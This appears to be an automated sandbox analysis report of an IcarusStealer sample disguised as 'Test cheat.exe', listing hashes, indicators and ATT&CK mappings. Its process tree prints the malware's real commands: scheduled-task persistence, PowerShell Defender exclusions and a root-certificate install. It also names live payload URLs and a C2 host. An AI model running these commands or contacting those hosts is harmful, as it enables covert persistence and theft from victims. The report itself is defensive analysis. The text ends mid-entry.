icarusstealer | 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Analysis

max time kernel
150s
max time network
147s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09/03/2024, 22:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Test cheat.exe
Size

24.9MB
MD5

4e1c29f0c1af62ddea916c6b80548c76
SHA1

38d9f15356b6a65f4e76ee739867d55b01493793
SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
SHA512

f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
SSDEEP

49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 6 IoCs

pid	Process
2180	Client.exe
1624	switched.exe
2604	pulse x loader.exe
2540	tesetey.exe
1744	RuntimeBroker.exe
2976	$SXR.exe

Loads dropped DLL 6 IoCs

pid	Process
1948	Test cheat.exe
1948	Test cheat.exe
1624	switched.exe
1624	switched.exe
1276	cmd.exe
812	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ipinfo.io

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\CatRoot\$SXR\Read.txt	Client.exe
File created	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\Read.txt	$SXR.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2540 set thread context of 776	2540	tesetey.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
296	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3012	timeout.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	tesetey.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	tesetey.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2540	tesetey.exe
1744	RuntimeBroker.exe
348	powershell.exe
2136	powershell.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
2180	Client.exe
2180	Client.exe
2180	Client.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe
1744	RuntimeBroker.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2540	tesetey.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeDebugPrivilege	776	cvtres.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeDebugPrivilege	1744	RuntimeBroker.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	2180	Client.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeDebugPrivilege	2976	$SXR.exe
Token: SeDebugPrivilege	2976	$SXR.exe
Token: SeShutdownPrivilege	1436	explorer.exe
Token: SeShutdownPrivilege	1436	explorer.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe

Suspicious use of SendNotifyMessage 15 IoCs

pid	Process
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe
1436	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1948 wrote to memory of 2180	1948	Test cheat.exe	28
PID 1948 wrote to memory of 2180	1948	Test cheat.exe	28
PID 1948 wrote to memory of 2180	1948	Test cheat.exe	28
PID 1948 wrote to memory of 2180	1948	Test cheat.exe	28
PID 1948 wrote to memory of 1624	1948	Test cheat.exe	29
PID 1948 wrote to memory of 1624	1948	Test cheat.exe	29
PID 1948 wrote to memory of 1624	1948	Test cheat.exe	29
PID 1948 wrote to memory of 1624	1948	Test cheat.exe	29
PID 1624 wrote to memory of 2604	1624	switched.exe	30
PID 1624 wrote to memory of 2604	1624	switched.exe	30
PID 1624 wrote to memory of 2604	1624	switched.exe	30
PID 1624 wrote to memory of 2604	1624	switched.exe	30
PID 1624 wrote to memory of 2540	1624	switched.exe	31
PID 1624 wrote to memory of 2540	1624	switched.exe	31
PID 1624 wrote to memory of 2540	1624	switched.exe	31
PID 1624 wrote to memory of 2540	1624	switched.exe	31
PID 2604 wrote to memory of 2644	2604	pulse x loader.exe	33
PID 2604 wrote to memory of 2644	2604	pulse x loader.exe	33
PID 2604 wrote to memory of 2644	2604	pulse x loader.exe	33
PID 2644 wrote to memory of 2416	2644	cmd.exe	35
PID 2644 wrote to memory of 2416	2644	cmd.exe	35
PID 2644 wrote to memory of 2416	2644	cmd.exe	35
PID 2644 wrote to memory of 2412	2644	cmd.exe	36
PID 2644 wrote to memory of 2412	2644	cmd.exe	36
PID 2644 wrote to memory of 2412	2644	cmd.exe	36
PID 2644 wrote to memory of 2576	2644	cmd.exe	37
PID 2644 wrote to memory of 2576	2644	cmd.exe	37
PID 2644 wrote to memory of 2576	2644	cmd.exe	37
PID 2540 wrote to memory of 2552	2540	tesetey.exe	38
PID 2540 wrote to memory of 2552	2540	tesetey.exe	38
PID 2540 wrote to memory of 2552	2540	tesetey.exe	38
PID 2540 wrote to memory of 2552	2540	tesetey.exe	38
PID 2552 wrote to memory of 2936	2552	csc.exe	39
PID 2552 wrote to memory of 2936	2552	csc.exe	39
PID 2552 wrote to memory of 2936	2552	csc.exe	39
PID 2552 wrote to memory of 2936	2552	csc.exe	39
PID 2540 wrote to memory of 1436	2540	tesetey.exe	40
PID 2540 wrote to memory of 1436	2540	tesetey.exe	40
PID 2540 wrote to memory of 1436	2540	tesetey.exe	40
PID 2540 wrote to memory of 1436	2540	tesetey.exe	40
PID 2540 wrote to memory of 776	2540	tesetey.exe	41
PID 2540 wrote to memory of 776	2540	tesetey.exe	41
PID 2540 wrote to memory of 776	2540	tesetey.exe	41
PID 2540 wrote to memory of 776	2540	tesetey.exe	41
PID 2540 wrote to memory of 776	2540	tesetey.exe	41
PID 2540 wrote to memory of 776	2540	tesetey.exe	41
PID 2540 wrote to memory of 776	2540	tesetey.exe	41
PID 2540 wrote to memory of 776	2540	tesetey.exe	41
PID 2540 wrote to memory of 776	2540	tesetey.exe	41
PID 2540 wrote to memory of 1276	2540	tesetey.exe	42
PID 2540 wrote to memory of 1276	2540	tesetey.exe	42
PID 2540 wrote to memory of 1276	2540	tesetey.exe	42
PID 2540 wrote to memory of 1276	2540	tesetey.exe	42
PID 1436 wrote to memory of 1568	1436	explorer.exe	44
PID 1436 wrote to memory of 1568	1436	explorer.exe	44
PID 1436 wrote to memory of 1568	1436	explorer.exe	44
PID 1276 wrote to memory of 1744	1276	cmd.exe	45
PID 1276 wrote to memory of 1744	1276	cmd.exe	45
PID 1276 wrote to memory of 1744	1276	cmd.exe	45
PID 1276 wrote to memory of 1744	1276	cmd.exe	45
PID 776 wrote to memory of 2148	776	cvtres.exe	46
PID 776 wrote to memory of 2148	776	cvtres.exe	46
PID 776 wrote to memory of 2148	776	cvtres.exe	46
PID 776 wrote to memory of 2148	776	cvtres.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Test cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1948
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
    3⤵
    PID:1108
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
      4⤵
      Creates scheduled task(s)
      PID:296
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2AF7.tmp.bat""
    3⤵
    - Loads dropped DLL
    PID:812
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3012
  - - C:\Windows\System32\CatRoot\$SXR\$SXR.exe
      "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      PID:2976
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "$SXR"
        5⤵
        
        PID:1796
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /f /tn "$SXR"
        6⤵
        
        PID:1612
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp87FD.tmp.bat""
        5⤵
        
        PID:2864
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
        6⤵
        
        PID:2564
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp87FE.tmp.bat" "
        5⤵
        
        PID:2376
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
        6⤵
        
        PID:1276
- C:\Users\Admin\AppData\Local\Temp\switched.exe
  "C:\Users\Admin\AppData\Local\Temp\switched.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1624
- - C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2644
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        5⤵
        
        PID:2416
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:2412
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:2576
- - C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2540
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\getngk55\getngk55.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2552
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1AC1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCD5AC9B0E9E34FA5B096EC3B1E36CCE.TMP"
        5⤵
        
        PID:2936
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1436
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:1568
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:776
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
        5⤵
        
        PID:2148
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:348
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
        5⤵
        
        PID:2176
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2136
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe & exit
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1276
    - - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab56BA.tmp

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
3.2MB

MD5
561ac87947d5c7c417d7560f5678bd8a

SHA1
a0ae489d250188d3276e4769f31caf63c341de53

SHA256
9f75a805c9652d479a62d1b99340db6f037fbab3799137dc5efbbe134d27bd77

SHA512
7c7eff2df1f3f6ea467e43fe894b277cf0ec7e826447109a635aeb17452d78e36e4dd87d3e34a1d71646ed50de5d7834ec26f5b060ce7ab1b9700da1ea8beb3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
3.2MB

MD5
173bb72da1722594b6e2242b93045304

SHA1
d6f798eeda2ea8246a0b78700429f6b7c69c052c

SHA256
18217961fcb7af721ea8f1a75dbaa913949edbd036492787a4402101bf18d965

SHA512
f00edacc50e4edbfdf284a1a77c451fc52c4e3e6df2bd06d63d9c29fb85063a8249ee19b64d1fc9dfa7bf89d223befd02e511d38de469568e6ded9355b8797d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1AC1.tmp

Filesize
1KB

MD5
6f466a0fa7bae7c4e5041630103568e1

SHA1
213e38628df7906ba9089a9772c39d9b943be65e

SHA256
91df12fced240466f3a59c7de9a6bd6ce9aa8e8043e48b442ca53bc8e6934484

SHA512
e5efbddae6d0383c1f8296dc5809f6952ddd87a2c13ae319e35a5375521fe5b569d822c8b317fa27f6a0d4e3a8302e5a6252b0ecb9e99299921c192c8947e6f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar875E.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
896KB

MD5
f651fa5a4f8085bd2b76ea7ef65ad8f4

SHA1
eced0a11555b6bb65081e8fb8a9efb7c6f830f36

SHA256
ede0d7a91bfbfeb32e032c74a61875db7b68b9c503c288920f149d7bc73e5062

SHA512
cace1426d28ee8acca0c7a8997af2ba5513d4c04ab78203c00db4a047f268cd21290ddb69bce11c523596de11c508e6a2d9da541dfd30863b939adc4166aa077

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
455KB

MD5
959a5cd6925278984c5b9a1cea16f578

SHA1
2971c9b5db766d61123e39af796069bceb446109

SHA256
682ecb22c99751c368f4cfbc756a256af4539195d5abdee3f67c58bcd8584577

SHA512
b050a58e69856b794213b63ac2a0e47d1684f9e7c300d7d1b9afde27e12d43ca6b44f9305542189de2cbce74c364fb22c9046b5b86b680987962a64378c00fd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
2.9MB

MD5
b08718b6e72babef0628b16cb4eebac4

SHA1
03b9457474df44919aa4c27782aa5b99697597f8

SHA256
3f3d8c4eb1c1609a23b12a5447afda0db33fa2c6ed8244d278c0ba30c8fe4468

SHA512
5911ceaf42de98be1f7ffcd327dc9c1c044f7174a7ed54a1a3fab000817fca4aa98a660932ff839df51fc3b1fb2a82cf9c0e3d3f5b8d2d800261a9f61029e798

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
333KB

MD5
bddc81fc4196be2c84c4792479c1eea3

SHA1
f83773e11c1a9e7dd53328aaa616f01b8e51c615

SHA256
7f7c70b879a1253915c04cd61179d0432c6168c474b39b80fa68a1f8dfaa4aad

SHA512
04584e1962a30f278354b1ac1de459b61614c0838faa761bb8c1a858919f0b84e993bf937a290279cc5f0cad3f692d2be377e0d4c18fc252013d17f44d2b49a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
64KB

MD5
e4dc0eaff2f28a6243828b1e6edaba96

SHA1
9da8cb3b7cf2b11fc53bf4dfc7cbb8eb444821c6

SHA256
53c929e421bd70f561064b536a6723b8b4ba38493081068c84ec788ace76cbda

SHA512
11a719fb5ce44fabb050c8bed3237068e0c304d94ed375df881afe5f828a5316cec3a09c4f8f1e863a2ed06f92cb3b2d66716dcb5c97b7b49d3a957e916f8035

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2AF7.tmp.bat

Filesize
150B

MD5
7bf30d1344be7dbe7c4c72fd92c88e3e

SHA1
bbfe1c5da1c1b9c9042f0536579e342c47b07cc1

SHA256
449b4f88759e0264874fabcbe6f4438227db5627834d697f2d0a14b319b3f46c

SHA512
d61a7bdf7d80f5221f5f4ac6b54885640c2a891bdcffde918f064f820307b6cbae961aa9b3a94c46e82497213121fd788e5703687872e7d7528fc341bf263941

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp87FD.tmp.bat

Filesize
102B

MD5
77254e2811a755365d545e1d3ff9f2d3

SHA1
a636da37c78d35f5ae4da354ba713828c84bbc1d

SHA256
93d089dd1ca2d4aceb2f1ba6af5576e5af340026e28a93bc3f65cf9a39674505

SHA512
109f6917181e2eb904f449bda73ee879258b3ecc943396662c3fb283e7ec0f723fc2b5ab1e17bc1c0400b51d8408869e126a76a81259cee48b7464d110ce84a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp87FE.tmp.bat

Filesize
257B

MD5
349b281348437ed07fd0c7327bf2535d

SHA1
62c0050fd13a243ccdd64646c8653fde582cc5f9

SHA256
014ec5b69f23ad91fc7f33a0b33612020b644cb82259f356e546b3df5d468658

SHA512
22fee32e7ddb5d3daeb65fe969c5c872d99278f337386b7cc1301396c69a22d413625e46bf358f43d9e1b41a8168962be1dba081302beb8c37f2d7acfc83b656

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
303e0c799eb99638c1b6e251673801c4

SHA1
a347eb0e79dfbb351c3f4f00ad36c63881473c82

SHA256
de56c1e58c3abb14c7616fe6cc23fcd8b1de1d4cd67cbdd3e2aeaac607e1d705

SHA512
cffd062e1ae7a9df10072daa85f1076a2e8b32f001751be8af9f7e0b647c7328b54bb8d927b23ab5b6d96616de9c300fc4f875b2d442a38b519e0e2fe391d62a

Download Submit
C:\Users\Admin\AppData\Roaming\temp0923

Filesize
10B

MD5
f54e0ad084d6b44f4a7ff94514ba0fb8

SHA1
3e168eb2b1b20a00c079ce59941e4235a5129534

SHA256
f70ff68f63bdbc74f20647d2f96c1c9e4c1b783f059f901a6c2d09b1741fba1a

SHA512
404f73505792ffb73a82a004afa9f4e7423cacae6dc945532d1434970fc9e4836da9497734ab9e9a41f5b1b2c07ff6a78036d328b332ba78204eede011117a28

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
